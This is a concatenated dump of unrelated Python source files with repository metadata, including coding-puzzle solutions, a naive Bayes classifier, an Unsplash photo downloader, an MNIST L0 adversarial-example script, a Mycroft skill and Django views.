'Hatr', # Hatran
'Hung', # Old Hungarian
# Unicode-9.0 additions
'Adlm', # Adlam
}
def script_horizontal_direction(script_code, default=KeyError):
""" Return "RTL" for scripts that contain right-to-left characters
according to the Bidi_Class property. Otherwise return "LTR".
"""
if script_code not in Scripts.NAMES:
if isinstance(default, type) and issubclass(default, KeyError):
raise default(script_code)
return default
return str("RTL") if script_code in RTL_SCRIPTS else str("LTR")
def block(char):
""" Return the block property assigned to the Unicode character 'char'
as a string.
>>> block("a")
'Basic Latin'
>>> block(unichr(0x060C))
'Arabic'
>>> block(unichr(0xEFFFF))
'No_Block'
"""
code = byteord(char)
i = bisect_right(Blocks.RANGES, code)
return Blocks.VALUES[i-1]
def ot_tags_from_script(script_code):
""" Return a list of OpenType script tags associated with a given
Unicode script code.
Return ['DFLT'] script tag for invalid/unknown script codes.
"""
if script_code not in Scripts.NAMES:
return [OTTags.DEFAULT_SCRIPT]
script_tags = [
OTTags.SCRIPT_EXCEPTIONS.get(
script_code,
script_code[0].lower() + script_code[1:]
)
]
if script_code in OTTags.NEW_SCRIPT_TAGS:
script_tags.extend(OTTags.NEW_SCRIPT_TAGS[script_code])
script_tags.reverse() # last in, first out
return script_tags
def ot_tag_to_script(tag):
""" Return the Unicode script code for the given OpenType script tag, or
None for "DFLT" tag or if there is no Unicode script associated with it.
Raises ValueError if the tag is invalid.
"""
tag = tostr(tag).strip()
if not tag or " " in tag or len(tag) > 4:
raise ValueError("invalid OpenType tag: %r" % tag)
while len(tag) != 4:
tag += str(" ") # pad with spaces
if tag == OTTags.DEFAULT_SCRIPT:
# it's unclear which Unicode script the "DFLT" OpenType tag maps to,
# so here we return None
return None
if tag in OTTags.NEW_SCRIPT_TAGS_REVERSED:
return OTTags.NEW_SCRIPT_TAGS_REVERSED[tag]
# This side of the conversion is fully algorithmic
# Any spaces at the end of the tag are replaced by repeating the last
# letter. Eg 'nko ' -> 'Nkoo'.
# Change first char to uppercase
script_code = tag[0].upper() + tag[1]
for i in range(2, 4):
script_code += (script_code[i-1] if tag[i] == " " else tag[i])
if script_code not in Scripts.NAMES:
return None
return script_code
| 28.750903 | 78 | 0.648041 |
79462cf2f424a456a301657f3234b0e58e079a84 | 618 | py | Python | python_solutions/Two Strings.py | ersincebi/hackerrank | 9475c8e88e9071544c10a939fe7307c8e62fe3a0 | [
"MIT"
] | null | null | null | python_solutions/Two Strings.py | ersincebi/hackerrank | 9475c8e88e9071544c10a939fe7307c8e62fe3a0 | [
"MIT"
] | null | null | null | python_solutions/Two Strings.py | ersincebi/hackerrank | 9475c8e88e9071544c10a939fe7307c8e62fe3a0 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'twoStrings' function below.
#
# The function is expected to return a STRING.
# The function accepts following parameters:
# 1. STRING s1
# 2. STRING s2
#
def twoStrings(s1, s2):
return 'Yes' if set(s1) & set(s2) else 'No'
if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
# q = int(input().strip())
# for q_itr in range(q):
# s1 = input()
# s2 = input()
# result =
print(twoStrings('hello', 'world'))
print(twoStrings('hi', 'world'))
# fptr.write(result + '\n')
# fptr.close()
| 15.846154 | 46 | 0.639159 |
79462cfdc3a54276b5de5147caf153c958ad4c23 | 2,098 | py | Python | Ago-Dic-2020/Practicas/1er-Parcial/Práctica 5/strategy_test.py | Andremm303/DAS_Sistemas | 0163505737e2b24365ea8b4e8135773a6801add4 | [
"MIT"
] | null | null | null | Ago-Dic-2020/Practicas/1er-Parcial/Práctica 5/strategy_test.py | Andremm303/DAS_Sistemas | 0163505737e2b24365ea8b4e8135773a6801add4 | [
"MIT"
] | null | null | null | Ago-Dic-2020/Practicas/1er-Parcial/Práctica 5/strategy_test.py | Andremm303/DAS_Sistemas | 0163505737e2b24365ea8b4e8135773a6801add4 | [
"MIT"
] | null | null | null | import unittest
from strategy import *
class StrategyTest(unittest.TestCase):
def test_basic_auth_strategy(self):
context = AuthContext(BasicAuthConcreteStrategy(usr='tintin', passwd='123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with Basic Auth\n\tUser: tintin\n\tPass: 123456'
)
def test_oauth_strategy(self):
cred = {
"access_token": "una cadena muy larga",
"token_type": "Bearer",
"expires_in": 3600,
"refresh_token": "una cadena muy larga 2",
"scope": "readAndWrite"
}
context = AuthContext(OauthAuthConcreteStrategy(credentials=cred))
self.assertEqual(
context.authenticate(),
'### Authenticated with OAuth\n\tCredentials: {"access_token":"una cadena muy larga","token_type":"Bearer","expires_in":3600,"refresh_token":"una cadena muy larga 2","scope":"readAndWrite"}'
)
def test_api_key_strategy(self):
context = AuthContext(ApiKeyConcreteStrategy(api_key='tintin-123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with API Key\n\tKey: tintin-123456'
)
def test_default_strategy(self):
self.assertEqual(
AuthContext().authenticate(),
'### Authenticated with OAuth\n\tCredentials: {"access_token":"una cadena muy larga","token_type":"Bearer","expires_in":3600,"refresh_token":"una cadena muy larga 2","scope":"default"}'
)
def test_updating_strategy(self):
context = AuthContext(BasicAuthConcreteStrategy(usr='tintin', passwd='123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with Basic Auth\n\tUser: tintin\n\tPass: 123456'
)
context.set_strategy(ApiKeyConcreteStrategy(api_key='tintin-123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with API Key\n\tKey: tintin-123456'
)
if __name__ == "__main__":
unittest.main()
| 38.851852 | 202 | 0.629171 |
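_gaussian above is the per-feature Gaussian log-density of naive Bayes, summed across features and later combined with the class prior. A quick numpy check of that formula on a single feature (eps dropped for clarity); this mirrors the computation only, it is not the project's API:
import numpy as np
x, mean, var = 0.8, 0.5, 0.04
log_pdf = np.log(np.exp(-(x - mean) ** 2 / (2 * var)) / np.sqrt(2 * np.pi * var))
closed_form = -(x - mean) ** 2 / (2 * var) - 0.5 * np.log(2 * np.pi * var)  # usual closed form
print(np.isclose(log_pdf, closed_form))  # True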
79462eac4ecd7abea170b7cf91e6544702553490 | 1,576 | py | Python | MachineLearning/Bayes/bayes_classifier.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 2 | 2019-01-24T15:06:59.000Z | 2019-01-25T07:34:45.000Z | MachineLearning/Bayes/bayes_classifier.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 1 | 2019-12-23T09:45:11.000Z | 2019-12-23T09:45:11.000Z | MachineLearning/Bayes/bayes_classifier.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 1 | 2019-07-18T14:21:35.000Z | 2019-07-18T14:21:35.000Z | import numpy as np
from sklearn import datasets
from ..utils.dataset_operator import normalize, train_test_split
class NaiveBayes:
def __init__(self):
self.parameters = {}
def fit(self, train_data, train_label):
classes = np.unique(train_label)
for category in classes:
category_images = train_data[np.where(train_label == category)]
category_images_mean = np.mean(category_images, axis=0, keepdims=True)
category_images_variance = np.var(category_images, axis=0, keepdims=True)
parameters = {
"mean": category_images_mean,
"variance": category_images_variance,
"prior": category_images.shape[0] / train_data.shape[0]
}
self.parameters["class_" + str(category)] = parameters
def _gaussian(self, X, classes):
eps = 1e-3
mean = self.parameters["class_" + str(classes)]["mean"]
variance = self.parameters["class_" + str(classes)]["variance"]
numerator = np.exp(-(X - mean) ** 2 / (2 * variance + eps))
denominator = np.sqrt(2 * np.pi * variance + eps)
result = np.sum(np.log(numerator / denominator), axis=1, keepdims=True)
print(result)
return result.T
if __name__ == '__main__':
data = datasets.load_digits()
X = data.data[30:50]
X = normalize(X)
print("train data num:", X.shape[0])
y = data.target[30:50]
print("train data labels:", y)
classifier = NaiveBayes()
classifier.fit(X, y)
classifier._gaussian(X, 1)
| 33.531915 | 85 | 0.617386 |
794631f9b53acc55436aaea406d76339833b7cee | 2,715 | py | Python | prefix_sum/min_avg_two_slice/solution.py | Mendes11/codility_solutions | 036d7e0f14ef626eaa35cb28a30bb98217b46887 | [
"MIT"
] | null | null | null | prefix_sum/min_avg_two_slice/solution.py | Mendes11/codility_solutions | 036d7e0f14ef626eaa35cb28a30bb98217b46887 | [
"MIT"
] | null | null | null | prefix_sum/min_avg_two_slice/solution.py | Mendes11/codility_solutions | 036d7e0f14ef626eaa35cb28a30bb98217b46887 | [
"MIT"
] | null | null | null | from itertools import zip_longest
def solution(A):
"""
A non-empty array A consisting of N integers is given. A pair of integers (P, Q), such that 0 ≤ P < Q < N, is called a slice of array A (notice that the slice contains at least two elements). The average of a slice (P, Q) is the sum of A[P] + A[P + 1] + ... + A[Q] divided by the length of the slice. To be precise, the average equals (A[P] + A[P + 1] + ... + A[Q]) / (Q − P + 1).
For example, array A such that:
A[0] = 4
A[1] = 2
A[2] = 2
A[3] = 5
A[4] = 1
A[5] = 5
A[6] = 8
contains the following example slices:
slice (1, 2), whose average is (2 + 2) / 2 = 2;
slice (3, 4), whose average is (5 + 1) / 2 = 3;
slice (1, 4), whose average is (2 + 2 + 5 + 1) / 4 = 2.5.
The goal is to find the starting position of a slice whose average is minimal.
Write a function:
def solution(A)
that, given a non-empty array A consisting of N integers, returns the starting position of the slice with the minimal average. If there is more than one slice with a minimal average, you should return the smallest starting position of such a slice.
For example, given array A such that:
A[0] = 4
A[1] = 2
A[2] = 2
A[3] = 5
A[4] = 1
A[5] = 5
A[6] = 8
the function should return 1, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [2..100,000];
each element of array A is an integer within the range [−10,000..10,000].
"""
# So, the trick here is that you only need the averages of 2 or 3 steps
# ahead. Any more than this will not be minimal, because it will contain
# the minimal average inside it!
P1 = (prefix_sum_n_mean(A, 2))
P2 = (prefix_sum_n_mean(A, 3))
if not P2:
return 0 # P2 empty means we only have two values
starting_point = -1
min_avg = 100001
for i, (avg_2, avg_3) in enumerate(zip_longest(P1, P2)):
if avg_2 < min_avg:
min_avg = avg_2
starting_point = i
if avg_3 is not None and avg_3 < min_avg:
min_avg = avg_3
starting_point = i
return starting_point
def prefix_sum_n_mean(A, n_values):
"""
Calculates the average of the n_values ahead of each position of list A
:param A: list
:param n_means: number of values to use for each average
:return: list of averages
"""
n = len(A) - (n_values - 1)
P = [10000] * n
for k in range(n):
P[k] = 0
for i in range(n_values):
P[k] += A[k + i]
P[k] /= n_values
return P
| 31.206897 | 384 | 0.590424 |
79463245142582163931f0324587d9e405f6a209 | 1,815 | py | Python | download_user_unsplash_photos.py | Ourselp/unsplash-DigitalFrame | eb092aa4e845e7269bac744d9ba385e1c922cb6f | [
"MIT"
] | null | null | null | download_user_unsplash_photos.py | Ourselp/unsplash-DigitalFrame | eb092aa4e845e7269bac744d9ba385e1c922cb6f | [
"MIT"
] | null | null | null | download_user_unsplash_photos.py | Ourselp/unsplash-DigitalFrame | eb092aa4e845e7269bac744d9ba385e1c922cb6f | [
"MIT"
] | null | null | null | import pyunsplash
import requests
import os
import re
import json
import shutil
# If you have more than 50 photos on your account, consider pushing your app to production; otherwise you are limited to 50 API calls per hour.
pu = pyunsplash.PyUnsplash(api_key='YOUR API KEY')
def main():
pageNumber = 10
count = 0
update = False
retrievePic = 0;
while retrievePic < pageNumber:
this_user = pu.user('ourselp', w=100, h=100)
photos = this_user.photos(page=retrievePic, per_page=20) # photos is an instance of class Photos
retrievePic += 1
if photos.entries:
pageNumber += 1
for photo in photos.entries:
count += 1
filename = photo.id + '.jpeg'
linkSourceImg = requests.get(photo.link_download_location + '/?client_id=UVtouHS8slGsncRIUtSKsI5BZdiI2dzCQ0hav80KQ4Y')
data = linkSourceImg.json()
url = data['url']
path = '/home/pi/Desktop/photoframe/unsplash-pictures/%s' % filename
folder = '/home/pi/Desktop/photoframe/unsplash-pictures'
try:
                    image_file = open(path)
                    image_file.close()  # only probing for existence; close the handle instead of leaking it
                    print (" ---> Already have %s" % url)
except IOError:
print (" ---> Downloading %s" % url)
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
f.write(r.content)
update = True
#if it added or removed a photo, update slideshow
if update == True:
os.system("kill $(ps aux | grep '[f]eh' | awk '{print $2}')")
os.system("/home/pi/bin/script_slideshow")
if __name__ == '__main__':
main()
| 36.3 | 140 | 0.558127 |
794632471808bb167f52bd0d2a42e5ac85edd449 | 993 | py | Python | data/earnings_data.py | dutraa/alpaca1 | 103eb3056ae6a561a75eca79b345b41c9e68e97c | [
"MIT"
] | null | null | null | data/earnings_data.py | dutraa/alpaca1 | 103eb3056ae6a561a75eca79b345b41c9e68e97c | [
"MIT"
] | null | null | null | data/earnings_data.py | dutraa/alpaca1 | 103eb3056ae6a561a75eca79b345b41c9e68e97c | [
"MIT"
] | 1 | 2022-03-22T19:18:06.000Z | 2022-03-22T19:18:06.000Z | class EarningsDate(object):
def __init__(
self,
ticker,
companyshortname,
startdatetime,
startdatetimetype,
epsestimate,
epsactual,
epssurprisepct,
gmtOffsetMilliSeconds):
"""Return a new PennyAlgo object."""
self.ticker = ticker
self.companyshortname = companyshortname
self.startdatetime = startdatetime
self.startdatetimetype = startdatetimetype
self.epsestimate = epsestimate
self.epsactual = epsactual
self.epssurprisepct = epssurprisepct
self.gmtOffsetMilliSeconds = gmtOffsetMilliSeconds
def __str__(self):
# Override to print a readable string presentation of your object
        # below is a dynamic way of doing this without explicitly constructing the string manually
return ', '.join(['{key}={value}'.format(key=key, value=self.__dict__.get(key)) for key in self.__dict__])
| 34.241379 | 115 | 0.635448 |
7946339a7e7552fd8c447056aafd0e2939dcc5b6 | 6,488 | py | Python | L0_attack.py | abahram77/mnistChallenge | 94dca5a6c54b16cac44f1a429d96a5182be64a31 | [
"MIT"
] | null | null | null | L0_attack.py | abahram77/mnistChallenge | 94dca5a6c54b16cac44f1a429d96a5182be64a31 | [
"MIT"
] | null | null | null | L0_attack.py | abahram77/mnistChallenge | 94dca5a6c54b16cac44f1a429d96a5182be64a31 | [
"MIT"
] | null | null | null | """
Implementation of attack methods. Running this file as a program will
apply the attack to the model specified by the config file and store
the examples in an .npy file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import os
import tensorflow as tf
import numpy as np
import scipy.misc
from PIL import Image
from matplotlib import pyplot
class L0Attack:
def __init__(self, model, epsilon, threshold, a, random_start, loss_func):
"""Attack parameter initialization. The attack performs k steps of
size a, while always staying within epsilon from the initial
point."""
self.model = model
self.epsilon = epsilon
self.threshold = threshold
self.a = a
self.rand = random_start
if loss_func == 'xent':
loss = model.xent
elif loss_func == 'cw':
label_mask = tf.one_hot(model.y_input,
10,
on_value=1.0,
off_value=0.0,
dtype=tf.float32)
correct_logit = tf.reduce_sum(label_mask * model.pre_softmax, axis=1)
wrong_logit = tf.reduce_max((1-label_mask) * model.pre_softmax
- 1e4*label_mask, axis=1)
loss = -tf.nn.relu(correct_logit - wrong_logit + 50)
else:
print('Unknown loss function. Defaulting to cross-entropy')
loss = model.xent
self.grad = tf.gradients(loss, model.x_input)[0]
def perturb(self, x_nat, y, sess):
"""Given a set of examples (x_nat, y), returns a set of adversarial
examples within epsilon of x_nat in l_infinity norm."""
# if self.rand:
# x = x_nat + np.random.uniform(-self.epsilon, self.epsilon, x_nat.shape)
# x = np.clip(x, 0, 1) # ensure valid pixel range
# else:
# x = np.copy(x_nat)
x=np.copy(x_nat)
# first_image = x[0]
# first_image = np.array(first_image, dtype='float')
# pixels = first_image.reshape((28, 28))
# pyplot.imshow(pixels, cmap='gray')
# for k in range (len(x)):
# first_image = x[k]
# first_image = np.array(first_image, dtype='float')
# pixels = first_image.reshape((28, 28))
#
# # scipy.misc.imsave('/pics'+'/pic'+str(k)+'.jpg', pixels)
#
#
#
# # convert values to 0 - 255 int8 format
# formatted = (pixels * 255 / np.max(pixels)).astype('uint8')
# img = Image.fromarray(formatted)
# path = 'C:/Users/abahram77/PycharmProjects/mnist_challenge/mnist_challenge/L0_pics_nonPerturbed/'
# img.save(path+'pic'+str(k)+'.png')
listOfSets=[set() for i in range(200)]
listOfSets2=[set() for i in range(200)]
for i in range(self.threshold):
grad = sess.run(self.grad, feed_dict={self.model.x_input: x,
self.model.y_input: y})
grad2 = grad.tolist()
for j in range(len(x)):
max_grad=np.where(grad[j] == np.amax(grad[j]))
index = max_grad[0][0]
# print(grad[j][index])
grad2=grad.tolist()
while (index in listOfSets[j]):
del grad2[j][index]
grad2=np.asanyarray(grad2)
max_grad = np.where(grad2[j] == np.amax(grad2[j]))
index = max_grad[0][0]
listOfSets[j].add(index)
x[j][index] =1
min_grad = np.where(grad[j] == np.amin(grad[j]))
index1 = min_grad[0][0]
grad2 = grad.tolist()
while (index1 in listOfSets2[j]):
del grad2[j][index1]
grad2 = np.asanyarray(grad2)
min_grad = np.where(grad2[j] == np.amin(grad2[j]))
index1 = min_grad[0][0]
listOfSets2[j].add(index1)
# print(grad[j][index1])
x[j][index1]=0
# print(x[j][index])
# print(x[j])
# for k in range (len(x)):
# first_image = x[k]
# first_image = np.array(first_image, dtype='float')
# pixels = first_image.reshape((28, 28))
#
# # scipy.misc.imsave('/pics'+'/pic'+str(k)+'.jpg', pixels)
#
#
#
# # convert values to 0 - 255 int8 format
# formatted = (pixels * 255 / np.max(pixels)).astype('uint8')
# img = Image.fromarray(formatted)
# path = 'C:/Users/abahram77/PycharmProjects/mnist_challenge/mnist_challenge/L0_pics_perturbed/'
# img.save(path+'pic'+str(k)+'.png')
#
# #x += self.a * np.sign(grad)
#
#
# #x = np.clip(x, x_nat - self.epsilon, x_nat + self.epsilon)
# for i in range(0,len(listOfSets)):
# listOfSets[i]=len(listOfSets[i])
# listOfSets2[i]=len(listOfSets2[i])
# print(listOfSets)
# print(listOfSets2)
# print()
x = np.clip(x, 0, 1) # ensure valid pixel range
return x
if __name__ == '__main__':
import json
import sys
import math
from tensorflow.examples.tutorials.mnist import input_data
from model import Model
with open('config.json') as config_file:
config = json.load(config_file)
model_file = tf.train.latest_checkpoint(config['model_dir2'])
if model_file is None:
print('No model found')
sys.exit()
model = Model()
attack = L0Attack(model,
config['epsilon'],
config['threshold'],
config['a'],
config['random_start'],
config['loss_func'])
saver = tf.train.Saver()
mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
with tf.Session() as sess:
# Restore the checkpoint
saver.restore(sess, model_file)
# Iterate over the samples batch-by-batch
num_eval_examples = config['num_eval_examples']
eval_batch_size = config['eval_batch_size']
num_batches = int(math.ceil(num_eval_examples / eval_batch_size))
num_batches=1
x_adv = [] # adv accumulator
print('Iterating over {} batches'.format(num_batches))
for ibatch in range(num_batches):
bstart = ibatch * eval_batch_size
bend = min(bstart + eval_batch_size, num_eval_examples)
print('batch size: {}'.format(bend - bstart))
x_batch = mnist.test.images[bstart:bend, :]
y_batch = mnist.test.labels[bstart:bend]
x_batch_adv = attack.perturb(x_batch, y_batch, sess)
x_adv.append(x_batch_adv)
print('Storing examples')
path = config['store_adv_L0_path']
x_adv = np.concatenate(x_adv, axis=0)
np.save(path, x_adv)
print('Examples stored in {}'.format(path))
| 27.965517 | 105 | 0.60373 |
794633e9a3d0f3ebe147a8797f92cf019cfe841a | 6,102 | py | Python | __init__.py | MycroftAI/skill-naptime | 529ef9df1df29c9518ed5ddf452ecf402340672e | [
"Apache-2.0"
] | 2 | 2018-02-24T08:20:10.000Z | 2018-11-19T21:12:27.000Z | __init__.py | MycroftAI/skill-naptime | 529ef9df1df29c9518ed5ddf452ecf402340672e | [
"Apache-2.0"
] | 19 | 2017-12-11T15:54:43.000Z | 2022-03-27T23:51:48.000Z | __init__.py | MycroftAI/skill-naptime | 529ef9df1df29c9518ed5ddf452ecf402340672e | [
"Apache-2.0"
] | 26 | 2017-05-02T22:52:27.000Z | 2021-09-06T12:46:21.000Z | # Copyright 2017, Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from mycroft import AdaptIntent, MycroftSkill, intent_handler
from mycroft.audio import wait_while_speaking
from mycroft.configuration.config import Configuration
from mycroft.messagebus.message import Message
class NapTimeSkill(MycroftSkill):
"""Skill to handle mycroft speech client listener sleeping."""
def __init__(self) -> None:
"""Initialize NapTimeSkill"""
super().__init__()
self.started_by_skill = False
self.sleeping = False
self.old_brightness = 30
self.disabled_confirm_listening = False
def initialize(self) -> None:
"""Perform final initialization once Skill class has loaded."""
self.add_event('mycroft.awoken', self.handle_awoken)
self.platform = self.config_core.get(
"enclosure").get("platform", "unknown")
self.wake_word = Configuration.get()['listener']['wake_word']
@intent_handler(AdaptIntent("NapTimeIntent").require("SleepCommand"))
def handle_go_to_sleep(self, _) -> None:
"""Sends a message to the speech client putting the listener to sleep.
If the user has been told about the waking up process five times
already, it sends a shorter message.
"""
count = self.settings.get('Wake up count', 0)
count += 1
self.settings['Wake up count'] = count
if count <= 5:
self.speak_dialog('going.to.sleep', {'wake_word': self.wake_word})
else:
self.speak_dialog('going.to.sleep.short')
self.perform_sleep()
def handle_awoken(self, _) -> None:
"""Handler for the mycroft.awoken message
The message is sent when the listener hears 'Hey Mycroft, Wake Up',
this handles the user interaction upon wake up.
"""
started_by_skill = self.started_by_skill
self.perform_awaken()
if started_by_skill:
# Announce that the unit is awake
self.speak_dialog("i.am.awake")
self.display_waking_face()
def display_sleep_face(self) -> None:
"""Display the sleeping face depending on the platform."""
if self.gui.connected:
self.gui.show_page("resting.qml", override_idle=True)
elif self.platform == "mycroft_mark_1":
self.display_sleep_animation()
def display_sleep_animation(self) -> None:
"""Dim and look downward to 'go to sleep'."""
# TODO: Get current brightness from somewhere
self.old_brightness = 30
for i in range(0, (self.old_brightness - 10) // 2):
self.enclosure.eyes_brightness(self.old_brightness - i * 2)
time.sleep(0.15)
self.enclosure.eyes_look("d")
def display_waking_face(self) -> None:
"""Display the waking face depending on the platform."""
if self.gui.connected:
self.gui.remove_page("resting.qml")
self.gui.show_page("awake.qml", override_idle=5)
# TODO Screen not reverting after the specified 5 seconds.
# The following 2 lines shouldn't be needed. Remove when fixed.
time.sleep(5)
self.gui.release()
elif self.platform == 'mycroft_mark_1':
self.display_wake_up_animation()
def display_wake_up_animation(self) -> None:
"""Mild animation to come out of sleep from voice command.
Pop open eyes and wait a sec.
"""
self.enclosure.eyes_reset()
time.sleep(1)
self.enclosure.eyes_blink('b')
time.sleep(1)
# brighten the rest of the way
self.enclosure.eyes_brightness(self.old_brightness)
def perform_awaken(self) -> None:
"""Perform actions to wake system up."""
if self.platform != "unknown":
self.bus.emit(Message('mycroft.volume.unmute',
data={"speak_message": False}))
elif self.disabled_confirm_listening:
self.enable_confirm_listening()
self.sleeping = False
self.started_by_skill = False
def perform_sleep(self) -> None:
"""Perform actions to put system to sleep."""
self.bus.emit(Message('recognizer_loop:sleep'))
self.sleeping = True
self.started_by_skill = True
# TODO - Work out why this is here...
wait_while_speaking()
time.sleep(2)
wait_while_speaking()
self.display_sleep_face()
if self.platform != "unknown":
self.bus.emit(Message('mycroft.volume.mute',
data={"speak_message": False}))
elif self.config_core['confirm_listening']:
self.disable_confirm_listening()
def disable_confirm_listening(self) -> None:
"""Patch active mycroft configuration to disable listening beep."""
msg = Message('configuration.patch',
data={'config': {'confirm_listening': False}}
)
self.bus.emit(msg)
self.disabled_confirm_listening = True
self.log.info('Disabled listening chirp')
def enable_confirm_listening(self) -> None:
"""Patch active mycroft configuration to enable listening beep."""
msg = Message('configuration.patch',
data={'config': {'confirm_listening': True}}
)
self.bus.emit(msg)
self.disabled_confirm_listening = False
self.log.info('Enabled listening chirp again')
def create_skill():
return NapTimeSkill()
| 38.1375 | 78 | 0.635693 |
79463417774c03aa13964320dbbe17d00789245e | 2,128 | py | Python | tools_of_curiosity_app/t4c/views.py | Innovators-for-Purpose/tools-of-curiosity | 4fa02c10f8ce9e700dd0275ee7d5a46494638c5b | [
"MIT"
] | null | null | null | tools_of_curiosity_app/t4c/views.py | Innovators-for-Purpose/tools-of-curiosity | 4fa02c10f8ce9e700dd0275ee7d5a46494638c5b | [
"MIT"
] | 1 | 2021-07-28T15:26:58.000Z | 2021-07-28T15:26:58.000Z | tools_of_curiosity_app/t4c/views.py | Innovators-for-Purpose/tools-of-curiosity | 4fa02c10f8ce9e700dd0275ee7d5a46494638c5b | [
"MIT"
] | 6 | 2021-07-06T17:37:44.000Z | 2021-07-07T13:25:06.000Z | from django.shortcuts import render
from django.http import HttpResponse
from pprint import pprint
def index(request):
print("t4c/views.py @ index()")
pprint(request)
context = {}
return render(request, "t4c/index.html", context)
def aframedemo(request):
print("t4c/views.py @ aframedemo()")
pprint(request)
context = {}
return render(request, "t4c/aframedemo.html", context)
def Angel(request):
print("t4c/views.py @ Angel()")
pprint(request)
context = {}
return render(request, "t4c/Angel.html", context)
def minigame2(request):
print("t4c/views.py @ minigame2()")
pprint(request)
context = {}
return render(request, "t4c/minigame2.html", context)
def minigame3(request):
print("t4c/views.py @ minigame3()")
pprint(request)
context = {}
return render(request, "t4c/minigame3.html", context)
def minigame4(request):
print("t4c/views.py @ minigame4()")
pprint(request)
context = {}
return render(request, "t4c/minigame4.html", context)
def designsprint(request):
print("t4c/views.py @ designsprint()")
pprint(request)
context = {}
return render(request, "t4c/designsprint.html", context)
def designsprint2(request):
print("t4c/views.py @ designsprint2()")
pprint(request)
context = {}
return render(request, "t4c/designsprint2.html", context)
def OBSOLETEindex(request):
return HttpResponse("Hello, world. You're at the t4c index.")
def default(request):
print("t4c/views.py @ default()")
pprint(request)
context = {}
return render(request, "t4c/default.html", context)
def Egypt(request):
print("t4c/views.py @ Egypt()")
pprint(request)
context = {}
return render(request, "t4c/Egypt.html", context)
def cricket(request):
print("t4c/views.py @ cricket()")
pprint(request)
context = {}
return render(request, "t4c/cricket.html", context)
def level1(request):
print("t4c/views.py @ level1()")
pprint(request)
context = {}
return render(request, "t4c/level1.html", context)
| 27.282051 | 65 | 0.648966 |
79463505f607536c52b371760d9c549454553c6a | 707 | py | Python | tests/test_dbf.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 23 | 2017-05-25T01:08:58.000Z | 2019-06-22T19:35:50.000Z | tests/test_dbf.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 153 | 2020-10-07T13:42:08.000Z | 2022-03-18T08:11:37.000Z | tests/test_dbf.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 9 | 2020-10-22T08:54:20.000Z | 2022-02-01T10:23:22.000Z | # -*- coding: utf-8 -*-
from .support import TestCase
class DBFIngestorTest(TestCase):
def test_simple_dbf(self):
fixture_path, entity = self.fixture("PAK_adm1.dbf")
self.manager.ingest(fixture_path, entity)
self.assertEqual(entity.first("processingStatus"), self.manager.STATUS_SUCCESS)
entities = self.get_emitted()
table = entities[0]
self.assertEqual(len(entities), 1)
self.assertEqual(entity.schema.name, "Table")
self.assertTrue(entity.has("csvHash"))
self.assertEqual(int(entity.first("rowCount")), 9)
self.assertIn("Azad Kashmir", table.get("indexText"))
self.assertIn("Pakistan", table.get("indexText"))
| 39.277778 | 87 | 0.66761 |
794635b18ba1eb1151fc872d910da8b5bbcbc676 | 1,322 | py | Python | rclpy/topics/minimal_subscriber/setup.py | rpaaron/examples | 1877840376ddf2fde4e553333e282ee7034c049a | [
"Apache-2.0"
] | null | null | null | rclpy/topics/minimal_subscriber/setup.py | rpaaron/examples | 1877840376ddf2fde4e553333e282ee7034c049a | [
"Apache-2.0"
] | null | null | null | rclpy/topics/minimal_subscriber/setup.py | rpaaron/examples | 1877840376ddf2fde4e553333e282ee7034c049a | [
"Apache-2.0"
] | 1 | 2021-03-06T10:13:26.000Z | 2021-03-06T10:13:26.000Z | from setuptools import setup
package_name = 'examples_rclpy_minimal_subscriber'
setup(
name=package_name,
version='0.10.2',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
author='Mikael Arguedas',
author_email='[email protected]',
maintainer='Mikael Arguedas',
maintainer_email='[email protected]',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description='Examples of minimal subscribers using rclpy.',
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'subscriber_old_school ='
' examples_rclpy_minimal_subscriber.subscriber_old_school:main',
'subscriber_lambda = examples_rclpy_minimal_subscriber.subscriber_lambda:main',
'subscriber_member_function ='
' examples_rclpy_minimal_subscriber.subscriber_member_function:main',
],
},
)
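# Usage note (assumption, not part of this file): once the package is built
# (e.g. with colcon), each console_scripts entry above becomes a runnable
# executable, e.g.
#   ros2 run examples_rclpy_minimal_subscriber subscriber_member_function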
| 33.05 | 91 | 0.658094 |
794635c63ebcae4296a49130b6dd20586d675944 | 3,185 | py | Python | src/ui_custom.py | vincentX3/TrainingRecords | 1863761356887b0d20448fc46cf57d00dbba77b2 | [
"MIT"
] | null | null | null | src/ui_custom.py | vincentX3/TrainingRecords | 1863761356887b0d20448fc46cf57d00dbba77b2 | [
"MIT"
] | null | null | null | src/ui_custom.py | vincentX3/TrainingRecords | 1863761356887b0d20448fc46cf57d00dbba77b2 | [
"MIT"
] | null | null | null | import sys
